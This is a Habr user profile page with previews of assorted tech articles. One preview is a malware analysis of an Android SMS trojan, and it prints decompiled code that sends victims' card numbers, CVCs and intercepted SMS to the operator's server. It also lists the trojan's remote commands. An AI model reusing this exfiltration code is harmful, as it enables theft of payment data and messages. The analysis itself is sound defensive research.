Как стать автором
Обновить
20
0
Вадим Абрамов @tundrik

Пользователь

Отправить сообщение

Суд Бразилии выдал ордер на арест главы Google за отказ удалить видео с YouTube

Время на прочтение2 мин
Количество просмотров109K
У всех нас уже в печенках сидит информация о Самизнаетекаком фильме, размещение на сервисе YouTube которого повлекла за собой шквал негативных отзывов и запретов в некоторых странах, как самого фильма, так и видеохостинга целиком. Наша страна не стала исключением, и, вероятно, вскоре фильм будет включен в список экстремистских материалов и запрещен. При относительно схожем мнении многих стран, разнятся лишь способы перекрытия доступа к фильму – страны тяготеющие к тирании рубят «зло» на корню и блокируют доступ к YouTube полностью, тогда как более демократические страны просят сам Гугл удалить фильм с видеохостинга. Ответ Гугла на это нам известен. В связи с этим потрясающий мировой прецедент по аресту бразильского главы Гугл за схожий (речь пойдет не про тотсамыйфильм) отказ преподнес нам суд Бразилии.
Читать дальше →
Всего голосов 96: ↑84 и ↓12+72
Комментарии114

Проприетарные модемы провайдеров 3/3 (upd)

Время на прочтение3 мин
Количество просмотров2.5K

Введение


Это заключительная статья про проприетарные модемы, вы можете ознакомиться с первыми двумя бир, эки.

Как и было запланировано, в этой публикации я просто сравню доступные на рынке ключевые решения. Хочу заранее предупредить, таблицы упорядочены по количеству доступной информации. Если я допустил ошибку, или вы располагаете большей информацией, с радостью включу её в статью.

Таблицы разделены на 3 части: равенства, абсолютное превосходство, сравнимые данные. Может и не обычный подход, но сравнение упрощается.

Картинка выше – это первый распространённый ADSL модем производителя SAGEM, отбренденного Wanadoo, ныне Orange. Возможно от него и пошла идея о создании своего дитяти.

Ну где же эти таблицы уже?
Читать дальше →
Всего голосов 31: ↑22 и ↓9+13
Комментарии18

Как я позорно деактивировал ботнет

Время на прочтение10 мин
Количество просмотров191K
image

Разместил я, ничего не подозревая, объявление на avito.ru. Сколько раз туда ходил! Но на этот раз как-то не удалось…
Я давно был уверен, что многие нехорошие люди парсят телефонные номера с этого сайта, так что такси, строительные материалы, скорая компьютерная помощь, «8-800-555-3-555 — проще позвонить, чем у кого-то занимать» и приглашения на битву экстрасенсов для меня уже привычное дело, но на этот раз было нечто новое.

Приходит мне СМС-сообщение с текстом: «Зaинтерсoвaлo вaше oбьявление кaк нaсчет oбменa нa http://…». Прямо вот так, с пропущенным знаком препинания и ошибками. А по ссылке качается avito.apk. Интересно.

Исследование APK


Ну, подумал я, надо бы глянуть, что этот APK делает. Результат привычной для меня связки из apktool + dex2jar + jd-gui меня не удовлетворил, т.к. не было видно часть классов деревом, хотя доступ по ссылкам к ним получить было можно. Решил я воспользоваться новомодными онлайн-sandbox'ами — и декомпилированный код получил, и информацию, и pcap-файл со сдампленным трафиком. Как оказалось, этот файл загружали до меня, поэтому в мои руки попал более ранний анализ, что было достаточно полезно.

Итак, что умеет этот троян:
  • delivery&&& — рассылка СМС-сообщений на номера из телефонной книги с заданным текстом
  • sent&&& — отправка заданных СМС-сообщений с сервера
  • rent&&& — перехват всех СМС-сообщений и отправка их на сервер
  • sms_stop&&& — отмена перехвата СМС-сообщений
  • ussd&&& — USSD-запрос
  • call_1&&& — установка и отмена безусловной переадресации

Немного кода из моих заметок
protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(c())));
            arraylist.add(new BasicNameValuePair("number", b));
            arraylist.add(new BasicNameValuePair("month", Integer.toString(c.intValue())));
            arraylist.add(new BasicNameValuePair("year", Integer.toString(d.intValue())));
            arraylist.add(new BasicNameValuePair("cvc", Integer.toString(e.intValue())));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("set_card.php").toString());
    }






    protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("info", com.avito.a.c.b(b)));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("get.php").toString());
    }




    protected HttpRequestBase a()
    {
        try
        {
            JSONObject jsonobject = new JSONObject();
            jsonobject.put("text", c);
            jsonobject.put("number", d);
            jsonobject.put("date", e);
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("sms", jsonobject.toString()));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        catch(JSONException jsonexception)
        {
            jsonexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("load_sms.php").toString());


Помимо этих команд, троян отключает Wifi Sleep, пытается получить доступ к зашифрованному хранилищу и установить себя в качестве Android-администратора (естественно, при этом используются стандартные диалоги ОС, где можно отменить данное действие). Код трояна не обфусцирован, некоторые строки закодированы base64. Вообще непонятно, что это за троян такой. То ли его собирали копипастой, то ли он основан на каком-то другом трояне, то ли еще что, но в нем имеются строки на португальском, немецком, английском, Ubuntu-шрифты, форма для перехвата данных из приложения немецкого банка Commerzbank, значок какой-то игры и флеш-плеера.
Читать дальше →
Всего голосов 368: ↑362 и ↓6+356
Комментарии143

Оптимизация Linux для desktop и игр

Время на прочтение8 мин
Количество просмотров174K
В этой статье я хочу поделиться почти 10-летним опытом использования Linux на домашнем компьютере. За это время я провел много экспериментов над ядром, испробовал различные конфигурации для разных применений и теперь хочу все это систематизировать в длинный пост с рекомендациями как выжать из linux максимум и добиться отличной производительности, без необходимости покупать мощное железо.

Лично я считаю часть, где я написал про тюнинг ядра все же немного устарела и современное железо уже априори выдает необходимую производительность для нормальной работы, но, как мне удалось заметить недавно, с играми все равно, даже сейчас, есть проблемы, даже на мощном железе.

Хоть я и пообещал, что после прочтения этой статьи, можно будет играть в Metro 2033 на калькуляторе (шутка, такого не будет), все же она начнется с рекомендации купить кое-что из железа, если у вас этого еще нет.
Читать дальше →
Всего голосов 132: ↑99 и ↓33+66
Комментарии296

Облака — ещё дешевле

Время на прочтение5 мин
Количество просмотров116K
Наверняка вы слышали о сервисах Amazon EC2, Rackspace и им подобным. Может быть даже пользовались. Лично мне бывает нужен иногда личный VPN-сервер. Для этих целей я уже давно держал микро-инстанс на Амазоне, предоставляемый им в течении первого года бесплатно. Плюс использовал для архивов Amazon Glacier, который с его ценой «1 цент за гигабайт в месяц» можно считать тоже почти бесплатным. Но вот год закончился и за EC2 стало нужно платить. Архивы мои тоже разрослись прилично и затраты на Glacier аналогично перестали радовать.

Случайно пробежавший мимо обзор сервиса DigitalOcean по-началу оставил меня равнодушным. Ну, облачный сервис, ну виртуалки. Ну да, чуть-чуть дешевле (но не так чтобы уж очень), чего-то аналогичного Glacier вроде бы нет да и вообще оно того не стоит.

Я сильно ошибался. Ниже будет рассказано как на базе DigitalOcean сделать себе VPN-сервер в пару десятков раз дешевле такого же на Амазоне и сервис хранения архивов, в бесконечность раз дешевле Glacier.
Читать дальше →
Всего голосов 120: ↑102 и ↓18+84
Комментарии87

Обучение пользователей своей организации

Время на прочтение2 мин
Количество просмотров12K

Информационная безопасность — это на 90% работа с людьми.



Фразу выше я не устану повторять никогда. Какой бы технически совершенной ни была ваша система безопасности, как бы безупречно и чётко ни была бы выстроена система управления ИБ, всегда есть человеческий фактор. Люди отвлекаются, забывают, «забивают» или просто игнорируют какие-то правила и порядки.

Под хабракатом я опишу довольно действенный способ снизить процент инцидентов связанных с человеческим фактором.
Читать дальше →
Всего голосов 11: ↑6 и ↓5+1
Комментарии12

Lehmann Audio Black Cube за 1000 р и 3 дня? Легко!

Время на прочтение4 мин
Количество просмотров200K
Купил простенькие уши, чтоб по ночам можно было гаматься и иногда слушать музыку, взял недорогие, но большие KOSS UR20. Подключив к ресиверу был несколько ошарашен, звук очень и очень приятный, джаз и классика просто на ура идут. По НЧ конечно сильно проигрывают затычкам Koss the plug, и ощутимо KOSS Porta Pro, которые уже какой год таскаю как портативные. Был очень удивлен после когда решил послушать Koss Porta Pro после прослушивания композиций на KOSS UR20 — с порта про как будто в уши ваты натолкали. А я ведь считал их очень «приличными» в плане звука. Хотя может это время и атмосфера их могла так попортить? Все это к чему? Да так, решил собрать усилок для ушей, Усилок будет домашний, не портативный ни разу.
Решил для начала собрать клон Lehmann Audio Black Cube Linear doctorhead.ru/catalogue/?i=523
Вот результат:

Все вместе заняло около 3 вечеров и меньше 1000 р денег.
Кому интересно добро пожаловать под кат, будет очень много фоток с подробным описанием.
Читать дальше →
Всего голосов 192: ↑188 и ↓4+184
Комментарии170

Настройка телефона Cisco серии 79XX для работы с Asterisk

Время на прочтение13 мин
Количество просмотров219K


В статье будут описаны нюансы настройки IP-телефона Cisco на примере цискофона 7942G.
Итак, если вы присматриваетесь к VoIP-устройствам Cisco серии 79XX, то добро пожаловать под кат.
Читать дальше →
Всего голосов 38: ↑35 и ↓3+32
Комментарии30

RuTracker взломан

Время на прочтение2 мин
Количество просмотров43K
В ночь на 14 августа торрент-портал RuTracker.org перестал открываться у большей части пользователей.
Судя по всему, ресурс был взломан хакерами. При заходе на сайт была установлена автоматическая переадресация на внешнюю страницу под заголовком Ita est! («это так» — лат.)

В учетных данных о домене rutracker.org на сервисе Whois появились строчки, набранные латиницей: «всего одному не стяжать человеку», «сокрушилась могучесть твоя», «завещанию внимай и исполни — никакой порнографии, никакой развязной, пошлой, оглупляющей рекламы».

Rutracker.org является наиболее популярным из российских торрент-трекеров. Первоначально ресурс существовал под названием Torrents.ru. В феврале 2010 года делегирование домена Torrents.ru было прекращено из-за уголовного дела по факту незаконного использования объектов авторского права.
Читать дальше →
Всего голосов 141: ↑121 и ↓20+101
Комментарии126

Как сисадмин сисадмину — советы для начинающих

Время на прочтение4 мин
Количество просмотров74K
За свой не малый опыт (18 лет из своих 31) системного администрирования, программирования и «эникейства», а так же активного участия в жизни любой организации, в которых работал, я выработал правила, которые помогали увеличивать количество клиентов не ухудшая качества работ. Это в основном советы (на манер некого знаменитого сайта про советы) «сисадминам», которые работают «на себя», в малом и среднем бизнесе, а так же в государственных организациях.

Правила мне помогали «в одного» иметь парк по городу Новосибирск 100-150 компьютеров без потери качества работ и ситуаций когда от моих услуг отказывались и не уставать ибо ещё семья.

Очень трудно в то время когда задача есть, а с кем-то посоветоваться не можешь.
Сейчас общение заменил интернет и форумы, раньше это только бессонные ночи и эксперименты (например, иметь в своём тех. отделе специальный компьютер, на котором мы тестировали вирусы и изучали как они работают и как их лечить).

Уверен, что эти советы кому-то помогут, а у кого-то вызовут ностальгию по этой профессии.

1. Клиент — это самое важное, что имеется у нас в «админском» деле! Это и бухгалтер и техничка.
2. Архивы это то, что нас отделяет от «смерти», нерадивых конкурентов и нашей хорошей репутации.
Читать дальше →
Всего голосов 122: ↑82 и ↓40+42
Комментарии169

Импорт фото из Picasa и Flickr в альбомы В Контакте

Время на прочтение1 мин
Количество просмотров1.2K
Picrolla
Лето близится к концу, и у всех накопилось огромное количество фото, которые нужно разобрать, отредактировать и, конечно же, показать всем-всем-всем. Думаю, у каждого есть любимый сервис для такого случая. Раньше, на ноутбуке с Windows, таким сервисом для меня была Picasa, а с переходом на Mac, стало удобнее пользоваться Flickr. Сегодня я хочу рассказать о Picrolla. Это приложение для импорта фотографий из Picasa и Flickr в альбомы В Контакте.
Что умеет Picrolla
Всего голосов 50: ↑37 и ↓13+24
Комментарии33

Можно ли верить своим глазам? (Unicode в именах файлов)

Время на прочтение2 мин
Количество просмотров32K
Несколько дней назад один из наших пользователей прислал образец (SHA1: fbe71968d4c5399c2906b56d9feadf19a35beb97, определяется как TrojanDropper:Win32/Vundo.L). Это троян для фишинга с сайтов vk.com и vkontakte.ru, запросы на которые перенаправляются на 92.38.209.252 необычным способом.

Обычный метод перенаправления трафика — добавить запись в файл hosts, который находится в папке %SystemRoot%\system32\drivers\etc. Однако, когда мы открываем этот файл на заражённом компьютере, то там нет никаких записей для vk.com и vkontakte.ru:


Читать дальше →
Всего голосов 308: ↑274 и ↓34+240
Комментарии245

Как разместить картинку внутри QR-кода

Время на прочтение2 мин
Количество просмотров140K
Автор блога Hack A Day Брайан Бенчофф (Brian Benchoff) разобрался в алгоритме генерации QR-кодов (стандарт ISO 18004) и составил инструкцию, как можно внедрить в QR-код произвольное изображение. Например, логотип фирмы.

Для работы использовались генератор QR-кодов и Microsoft Paint для попиксельного редактирования.

Шестая версия QR-кодов представляет собой квадрат со стороной 41 пиксел.



На картинке показан шаблон QR. На нём чёрные пикселы всегда обязаны быть чёрными, а белые обязаны быть белыми. Серая зона свободна для творчества.
Читать дальше →
Всего голосов 162: ↑143 и ↓19+124
Комментарии61

vSphere 5 — записки админа

Время на прочтение6 мин
Количество просмотров20K
Очень сложно конкурировать в описании vSphere 5 с более опытными блогерами, особенно теми, кто уже имел предварительный доступ к бета версии и к презентационным ресурсам VMware. Но я настолько сильно подсел в последнее время на продукты VMware, что не могу удержаться от того, чтобы не выложить свои короткие записи, которые я набросал вчера ночью во время онлайн презентации vSphere 5.

  • На сегодняшний день 40% серверной нагрузки приходится на виртуальные сервера. В среднем в год наблюдается 10% рост виртуализации
  • Основной темой первой части презентации было движение к облачной модели. Не важно будете ли вы строить частное облако только для нужд вашей компании, или же вы будете предоставлять облако внешним клиентм — вы все это можете легко сделать с помощью новых продуктов VMware. Клиенты должны легко и удобно выбирать виртуальные машины под свои нужды в точности так же, как люди покупают компьютер в онлайн магазине, имея возможность настроить покупку под свои требования. Вобщем, классическая модель IT as a Service.
Читать дальше →
Всего голосов 18: ↑18 и ↓0+18
Комментарии28

Web-интерфейс для Iptables

Время на прочтение4 мин
Количество просмотров74K
# iptables -t nat -N test
# iptables -t nat -A test -p tcp -j REDIRECT --to-port 80
# iptables -t nat -A test -p tcp -j MASQUERADE
# iptables -t nat -A POSTROUTING -j test
iptables: Invalid argument. Run `dmesg' for more information.
# dmesg | tail -n 1
ip_tables: REDIRECT target: used from hooks POSTROUTING, but only usable from PREROUTING/OUTPUT
# iptables -t nat -A PREROUTING -j test
iptables: Invalid argument. Run `dmesg' for more information.
# dmesg | tail -n 1
ip_tables: MASQUERADE target: used from hooks PREROUTING, but only usable from POSTROUTING


Это пост о программе Iptables и о веб-интерфейсе для неё.
Читать дальше →
Всего голосов 91: ↑61 и ↓30+31
Комментарии49

SMS и SIP шлюз — Мультифон, Asterisk, Kannel

Время на прочтение5 мин
Количество просмотров85K
В данной статье дается описание того, каким образом можно объединить достоинства Asterisk как PBX или IVR, Kannel как SMS-шлюза используя один телефонный номер.

Для этого я использовал Freebsd 8.2 на сервере, модем Huawei E171, но можно использовать любой модем МТС или Мегафон производства huawei (так же было проверено на модеме E1551), сим-карту Мегафона. В качестве софтфонов использовались Telephone и SJphone.
Читать дальше →
Всего голосов 44: ↑39 и ↓5+34
Комментарии23

Обзор свободно доступных и бесплатных IP АТС (Asterisk, FreeSWITCH, SipXecs, Yate)

Время на прочтение15 мин
Количество просмотров196K

Обзор свободно доступных и бесплатных IP АТС: Asterisk, FreeSWITCH, SipXecs, Yate. Приводятся преимущества и недостатки, сравнительный анализ функциональности и сфер применения. Делается вывод о том, что все продукты можно сочетать друг с другом.



Некоторое время назад ко мне обратился товарищ из «Открытых Систем» и попросил сделать обзор открытых IP АТС. Так как он обратился не только ко мне, а еще и к другим экспертам IP телефонии, то в результате в журнал попала компиляция, в которой мало осталось от моего оригинального обзора. Публикую его целиком на Хабре.

Вначале будет теоретическая вставка, для тех, кто не совсем в теме. Если будет скучно — просто пропустите ее! Приятного чтения! А чтобы лучше читалось, главы сопровождаются музыкальными подарками (настоятельно рекомендую наушники :-)

Поехали!

Теория

PBX (Private Branch Exhange) — английский термин, обозначающий офисную телефонную станцию, которая обеспечивает установление, поддержание и разрыв соединений между аппаратами, то есть коммутацию. PBX позволяет разделять ограниченные ресурсы (городские линии и номера) между неограниченным числом внутренних пользователей, при помощи таких телефонных функций, как внутренний номерной план, перевод звонков, постановка на удержание, и других.

Именно поэтому PBX система необходима любой организации — она позволяет эффективно организовать телефонную связь на предприятии (ну, пока еще нужна ;-)

Читать дальше →
Всего голосов 92: ↑79 и ↓13+66
Комментарии68

Управление радиоэфиром через браузер

Время на прочтение5 мин
Количество просмотров32K
Airtime LogoВ процессе создания своей радиостанции поток идей дошел до ведения эфиров через веб-интерфейс. Сначала пытался найти готовые решения, но в рунете почти ничего не нашел. Начал продумывать способ реализации и чудом наткнулся на статью в английской версии Википедии про Airtime (до 18 января 2011 г. – Campcaster) от Sourcefabric.

Возможности Airtime:
  • Создание эфирной сетки и плейлистов через веб-интерфейс ;
  • Загрузка музыки через браузер (поддержка drag and drop);
  • Регистрация ведущих, которые имеют доступ к админке и могут управлять эфирами;
  • Создание виджетов с расписанием эфиров и треков для сторонних сайтов;
  • Возможность записывать эфиры для повторной трансляции;
  • Несколько вариантов трансляции аудиопотока.
Минимальные системные требования, описанные в официальной инструкции: 1Ghz процессор и 512Mb оперативной памяти.
Читать дальше →
Всего голосов 68: ↑64 и ↓4+60
Комментарии34

Маркировка кабелей

Время на прочтение6 мин
Количество просмотров119K
В этой статье:
  • подготовка таблицы коммутаций;
  • варианты маркировки (что наносить на кабели);
  • обзор методов нанесения маркировки;
  • пример работы с одним из методов, включая макрос и шаблон для распечатки.
Читать дальше →
Всего голосов 112: ↑109 и ↓3+106
Комментарии41
1

Информация

В рейтинге
Не участвует
Откуда
Апатиты, Мурманская обл., Россия
Дата рождения
Зарегистрирован
Активность